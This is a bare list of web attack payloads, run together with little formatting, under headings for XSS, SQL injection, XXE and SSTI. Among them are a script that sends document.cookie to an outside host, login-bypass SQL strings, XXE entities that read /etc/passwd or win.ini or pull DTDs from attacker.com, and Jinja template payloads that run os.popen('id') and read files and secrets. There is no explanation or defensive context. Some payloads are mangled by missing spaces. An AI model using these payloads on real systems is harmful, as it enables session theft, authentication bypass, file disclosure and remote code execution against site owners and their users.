<script>alert(1)</script><scriptsrc=//14.rs></script>"><svgonload=alert()><embedsrc=//14.rs><!--><script src=//14.rs>url=%26%2302java%26%23115cript:alert(document.domain)<video><source onerror=location=/\02.rs/+document.cookie><script>alert(document.domain)</script><a href=javascript:confirm()>click here
SQL Injection Payloads
' OR '1'='1' OR '1'='1' --'OR'1'='1'/* ' OR '1'='1' //' OR '1'='1' #admin' --admin' /*admin' //admin' #' OR 1=1' OR 1=1 --' OR 1=1 /*' OR 1=1 //' OR 1=1 #' OR 'a'='a' OR 'a'='a' --' OR 'a'='a' /*' OR 'a'='a' //' OR 'a'='a' #
xmlCopy code<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>
SSTI Payloads
# jinja{{7*7}}{{7*'7'}}{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}{{config.items()}}{{''.__class__.__mro__[2].__subclasses__()}}{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}{% for c in [].__class__.__base__.__subclasses__() %}{{c}}{% endfor %}{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}{{request.application.__globals__.__builtins__.open('index.html').read()}}